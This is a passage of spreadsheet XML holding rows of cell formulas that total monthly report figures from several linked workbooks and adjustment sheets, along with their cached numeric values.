        <f>[10]月报!$D$23+[11]月报!$D$17+[12]月报!$D$17+[13]月报!$D$25+[14]月报!$D$8+[14]月报!$D$15+[15]月报!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>[10]月报!$E$23+[11]月报!$E$17+[12]月报!$E$17+[13]月报!$E$25+[14]月报!$E$8+[14]月报!$E$15+[15]月报!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+调整表!H6</f>
        <v>11871.02</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>288220.98</v>
      </c>
      <c r="J6" s="194">
        <f>[10]月报!$I$23+[11]月报!$I$17+[12]月报!$I$17+[13]月报!$I$25+[14]月报!$E$23+[14]月报!$E$30+[15]月报!$H$7</f>
        <v>0</v>
      </c>
      <c r="K6" s="194">
        <f>J6+调整表!K6</f>
        <v>23039.03</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>285236.73</v>
      </c>
      <c r="M6" s="194">
        <f>[10]月报!$L$23+[11]月报!$L$17+[12]月报!$L$17+[13]月报!$L$25+[14]月报!$H$23+[14]月报!$H$30+[15]月报!$K$7</f>
        <v>20944.83</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>[10]月报!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>[10]月报!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>[10]月报!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>[10]月报!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>[10]月报!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>[10]月报!$V$102</f>
        <v>32.4794406392694</v>
      </c>
      <c r="X6" s="198">
        <f>[10]月报!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>[10]月报!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>[10]月报!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>[12]月报!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>[12]月报!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+调整表!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>[12]月报!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+调整表!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>[12]月报!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>[10]月报!$W$107</f>
        <v>0</v>
      </c>
      <c r="S7" s="202">
        <f>[10]月报!$X$107</f>
        <v>125.600949313443</v>
      </c>
      <c r="T7" s="198">
        <f>[10]月报!$Y$107</f>
        <v>131.25975586071</v>
      </c>
      <c r="U7" s="198">
        <f>[10]月报!$T$107</f>
        <v>0</v>
      </c>
      <c r="V7" s="198">
        <f>[10]月报!$U$107</f>
        <v>39.6438172043011</v>
      </c>
      <c r="W7" s="198">
        <f>[10]月报!$V$107</f>
        <v>31.7394977168949</v>
      </c>
      <c r="X7" s="198">
        <f>[10]月报!$Q$107</f>
        <v>0</v>
      </c>
      <c r="Y7" s="198">
        <f>[10]月报!$R$107</f>
        <v>294.95</v>
      </c>
      <c r="Z7" s="198">
        <f>[10]月报!$S$107</f>
        <v>2780.38</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>[10]月报!$D$27+[11]月报!$D$18+[13]月报!$D$26+[14]月报!$D$10+[14]月报!$D$17+[15]月报!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>[10]月报!$E$27+[11]月报!$E$18+[13]月报!$E$26+[14]月报!$E$10+[14]月报!$E$17+[15]月报!$E$9</f>
        <v>0</v>
      </c>
      <c r="H8" s="194">
        <f>G8+调整表!H8</f>
        <v>72204.05</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>597741.04</v>
      </c>
      <c r="J8" s="194">
        <f>[10]月报!$I$27+[11]月报!$I$18+[13]月报!$I$26+[14]月报!$E$25+[14]月报!$E$32+[15]月报!$H$9</f>
        <v>0</v>
      </c>
      <c r="K8" s="194">
        <f>J8+调整表!K8</f>
        <v>79580.42</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>587325.13</v>
      </c>
      <c r="M8" s="194">
        <f>[10]月报!$L$27+[11]月报!$L$18+[13]月报!$L$26+[14]月报!$H$25+[14]月报!$H$32+[15]月报!$K$9</f>
        <v>34503.53</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>[10]月报!$W$108</f>
        <v>0</v>
      </c>
      <c r="S8" s="198">
        <f>[10]月报!$X$108</f>
        <v>121.650312221231</v>
      </c>
      <c r="T8" s="198">
        <f>[10]月报!$Y$108</f>
        <v>126.657718650692</v>
      </c>
      <c r="U8" s="198">
        <f>[10]月报!$T$108</f>
        <v>0</v>
      </c>
      <c r="V8" s="198">
        <f>[10]月报!$U$108</f>
        <v>45.2016129032258</v>
      </c>
      <c r="W8" s="198">
        <f>[10]月报!$V$108</f>
        <v>28.9172374429223</v>
      </c>
      <c r="X8" s="198">
        <f>[10]月报!$Q$108</f>
        <v>0</v>
      </c>
      <c r="Y8" s="198">
        <f>[10]月报!$R$108</f>
        <v>336.3</v>
      </c>
      <c r="Z8" s="198">
        <f>[10]月报!$S$108</f>
        <v>2533.15</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>[10]月报!$D$24+[11]月报!$D$19+[12]月报!$D$20+[13]月报!$D$27+[14]月报!$D$11+[14]月报!$D$18+[15]月报!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>[10]月报!$E$24+[11]月报!$E$19+[12]月报!$E$20+[13]月报!$E$27+[14]月报!$E$11+[14]月报!$E$18+[15]月报!$E$10</f>
        <v>0</v>
      </c>
      <c r="H9" s="194">
        <f>G9+调整表!H9</f>
        <v>463479.46</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4598868.34</v>
      </c>
      <c r="J9" s="194">
        <f>[10]月报!$I$24+[11]月报!$I$19+[12]月报!$I$20+[13]月报!$I$27+[14]月报!$E$26+[14]月报!$E$33+[15]月报!$H$10</f>
        <v>0</v>
      </c>
      <c r="K9" s="194">
        <f>J9+调整表!K9</f>
        <v>484759.365</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4582238.176</v>
      </c>
      <c r="M9" s="194">
        <f>[10]月报!$L$24+[11]月报!$L$19+[12]月报!$L$20+[13]月报!$L$27+[14]月报!$H$26+[14]月报!$H$33+[15]月报!$K$10</f>
        <v>89585.807</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>[10]月报!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>[10]月报!$X$109</f>
        <v>262.129479427813</v>
      </c>
      <c r="T9" s="198">
        <f>[10]月报!$Y$109</f>
        <v>270.500810282931</v>
      </c>
      <c r="U9" s="198">
        <f>[10]月报!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>[10]月报!$U$109</f>
        <v>36.4569892473118</v>
      </c>
      <c r="W9" s="198">
        <f>[10]月报!$V$109</f>
        <v>35.0094748858447</v>
      </c>
      <c r="X9" s="198">
        <f>[10]月报!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>[10]月报!$R$109</f>
        <v>271.24</v>
      </c>
      <c r="Z9" s="198">
        <f>[10]月报!$S$109</f>
        <v>3066.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>[10]月报!$D$25+[11]月报!$D$20+[12]月报!$D$21+[13]月报!$D$28+[14]月报!$D$12+[14]月报!$D$19+[15]月报!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>[10]月报!$E$25+[11]月报!$E$20+[12]月报!$E$21+[13]月报!$E$28+[14]月报!$E$12+[14]月报!$E$19+[15]月报!$E$11</f>
        <v>0</v>
      </c>
      <c r="H10" s="194">
        <f>G10+调整表!H10</f>
        <v>66326.66</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>983853.83</v>
      </c>
      <c r="J10" s="194">
        <f>[10]月报!$I$25+[11]月报!$I$20+[12]月报!$I$21+[13]月报!$I$28+[14]月报!$E$27+[14]月报!$E$34+[15]月报!$H$11</f>
        <v>0</v>
      </c>
      <c r="K10" s="194">
        <f>J10+调整表!K10</f>
        <v>88041.12</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>985269.84</v>
      </c>
      <c r="M10" s="194">
        <f>[10]月报!$L$25+[11]月报!$L$20+[12]月报!$L$21+[13]月报!$L$28+[14]月报!$H$27+[14]月报!$H$34+[15]月报!$K$11</f>
        <v>39492.482</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>[10]月报!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>[10]月报!$X$110</f>
        <v>255.413159908187</v>
      </c>
      <c r="T10" s="198">
        <f>[10]月报!$Y$110</f>
        <v>267.689871953356</v>
      </c>
      <c r="U10" s="198">
        <f>[10]月报!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>[10]月报!$U$110</f>
        <v>35.1344086021506</v>
      </c>
      <c r="W10" s="198">
        <f>[10]月报!$V$110</f>
        <v>34.5372146118721</v>
      </c>
      <c r="X10" s="198">
        <f>[10]月报!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>[10]月报!$R$110</f>
        <v>261.4</v>
      </c>
      <c r="Z10" s="198">
        <f>[10]月报!$S$110</f>
        <v>3025.46</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>[10]月报!$D$26+[11]月报!$D$21+[12]月报!$D$19+[13]月报!$D$29+[14]月报!$D$13+[14]月报!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>[10]月报!$E$26+[11]月报!$E$21+[12]月报!$E$19+[13]月报!$E$29+[14]月报!$E$13+[14]月报!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+调整表!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>[10]月报!$I$26+[11]月报!$I$21+[12]月报!$I$19+[13]月报!$I$29+[14]月报!$E$28+[14]月报!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+调整表!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>[10]月报!$L$26+[11]月报!$L$21+[12]月报!$L$19+[13]月报!$L$29+[14]月报!$H$28+[14]月报!$H$35</f>
        <v>0</v>
      </c>
      <c r="N11" s="195"/>
      <c r="O11" s="199"/>
      <c r="P11" s="200"/>
      <c r="Q11" s="203" t="s">
        <v>298</v>
      </c>
      <c r="R11" s="204"/>
      <c r="S11" s="204"/>
      <c r="T11" s="204"/>
      <c r="U11" s="204"/>
      <c r="V11" s="204"/>
      <c r="W11" s="204"/>
      <c r="X11" s="204"/>
      <c r="Y11" s="204"/>
      <c r="Z11" s="204"/>
    </row>
    <row r="12" ht="15.75" customHeight="1" spans="1:26">
      <c r="A12" s="191"/>
      <c r="B12" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D12" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E12" s="194">
        <f>E22+E32+E42+E52</f>
        <v>538000</v>
      </c>
      <c r="F12" s="194">
        <f>F22+F32+F42+F52+F62+F69</f>
        <v>374372.59500005</v>
      </c>
      <c r="G12" s="194">
        <f>G22+G32+G42+G52</f>
        <v>0</v>
      </c>
      <c r="H12" s="194">
        <f>G12+调整表!H12</f>
        <v>227074.170000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5169465.42</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>0</v>
      </c>
      <c r="K12" s="194">
        <f>J12+调整表!K12</f>
        <v>525897.05</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5555003.426</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>139364.243000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>31.7458412300799</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>[16]月报!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>[16]月报!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>[16]月报!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>[16]月报!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>[16]月报!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>[16]月报!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>[16]月报!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>[16]月报!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>[16]月报!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+调整表!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+调整表!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>25.5714207339543</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>[11]月报!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>[11]月报!$X$68</f>
        <v>264.915466659846</v>
      </c>
      <c r="T13" s="209">
        <f>[11]月报!$Y$68</f>
        <v>266.288582387987</v>
      </c>
      <c r="U13" s="209">
        <f>[11]月报!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>[11]月报!$U$68</f>
        <v>52.5497311827957</v>
      </c>
      <c r="W13" s="209">
        <f>[11]月报!$V$68</f>
        <v>69.9372146118722</v>
      </c>
      <c r="X13" s="210">
        <f>[11]月报!$Q$68</f>
        <v>0</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>[11]月报!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>[11]月报!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>0</v>
      </c>
      <c r="H14" s="194">
        <f>G14+调整表!H14</f>
        <v>89402.228</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1053945.904</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>0</v>
      </c>
      <c r="K14" s="194">
        <f>J14+调整表!K14</f>
        <v>177263.228</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1970207.334</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>48773.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>[11]月报!$W$71</f>
        <v>0</v>
      </c>
      <c r="S14" s="209">
        <f>[11]月报!$X$71</f>
        <v>222.260786056245</v>
      </c>
      <c r="T14" s="209">
        <f>[11]月报!$Y$71</f>
        <v>214.198924423986</v>
      </c>
      <c r="U14" s="209">
        <f>[11]月报!$T$71</f>
        <v>0</v>
      </c>
      <c r="V14" s="209">
        <f>[11]月报!$U$71</f>
        <v>46.885752688172</v>
      </c>
      <c r="W14" s="209">
        <f>[11]月报!$V$71</f>
        <v>49.9466894977169</v>
      </c>
      <c r="X14" s="210">
        <f>[11]月报!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>[11]月报!$R$71</f>
        <v>348.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>[11]月报!$S$71</f>
        <v>4375.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+调整表!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+调整表!K15</f>
        <v>9668.522</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>124425.022</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>[11]月报!$W$72</f>
        <v>0</v>
      </c>
      <c r="S15" s="209">
        <f>[11]月报!$X$72</f>
        <v>62.9180855286523</v>
      </c>
      <c r="T15" s="209">
        <f>[11]月报!$Y$72</f>
        <v>61.4562464126039</v>
      </c>
      <c r="U15" s="209">
        <f>[11]月报!$T$72</f>
        <v>0</v>
      </c>
      <c r="V15" s="209">
        <f>[11]月报!$U$72</f>
        <v>64.3373655913979</v>
      </c>
      <c r="W15" s="209">
        <f>[11]月报!$V$72</f>
        <v>51.9083333333333</v>
      </c>
      <c r="X15" s="210">
        <f>[11]月报!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>[11]月报!$R$72</f>
        <v>478.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>[11]月报!$S$72</f>
        <v>4547.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+调整表!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+调整表!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>[11]月报!$W$73</f>
        <v>0</v>
      </c>
      <c r="S16" s="209">
        <f>[11]月报!$X$73</f>
        <v>61.0193746521838</v>
      </c>
      <c r="T16" s="209">
        <f>[11]月报!$Y$73</f>
        <v>62.7201850736321</v>
      </c>
      <c r="U16" s="209">
        <f>[11]月报!$T$73</f>
        <v>0</v>
      </c>
      <c r="V16" s="209">
        <f>[11]月报!$U$73</f>
        <v>65.2110215053763</v>
      </c>
      <c r="W16" s="209">
        <f>[11]月报!$V$73</f>
        <v>53.4404109589041</v>
      </c>
      <c r="X16" s="210">
        <f>[11]月报!$Q$73</f>
        <v>0</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>[11]月报!$R$73</f>
        <v>485.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>[11]月报!$S$73</f>
        <v>4681.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+调整表!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+调整表!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>[12]月报!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>[12]月报!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>[12]月报!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>[12]月报!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>[12]月报!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>[12]月报!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>[12]月报!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>[12]月报!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>[12]月报!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+调整表!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+调整表!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>[12]月报!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>[12]月报!$X$74</f>
        <v>217.982142857143</v>
      </c>
      <c r="T18" s="209">
        <f>[12]月报!$Y$74</f>
        <v>221.669906370098</v>
      </c>
      <c r="U18" s="209">
        <f>[12]月报!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>[12]月报!$U$74</f>
        <v>15.0537634408602</v>
      </c>
      <c r="W18" s="209">
        <f>[12]月报!$V$74</f>
        <v>7.69326484018265</v>
      </c>
      <c r="X18" s="209">
        <f>[12]月报!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>[12]月报!$R$74</f>
        <v>112</v>
      </c>
      <c r="Z18" s="209">
        <f>[12]月报!$S$74</f>
        <v>673.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+调整表!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+调整表!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>[13]月报!$W$72</f>
        <v>0</v>
      </c>
      <c r="S19" s="209">
        <f>[13]月报!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>[13]月报!$Y$72</f>
        <v>9.16666666666667e-6</v>
      </c>
      <c r="U19" s="209">
        <f>[13]月报!$T$72</f>
        <v>0</v>
      </c>
      <c r="V19" s="209">
        <f>[13]月报!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>[13]月报!$V$72</f>
        <v>4.24657534246575e-6</v>
      </c>
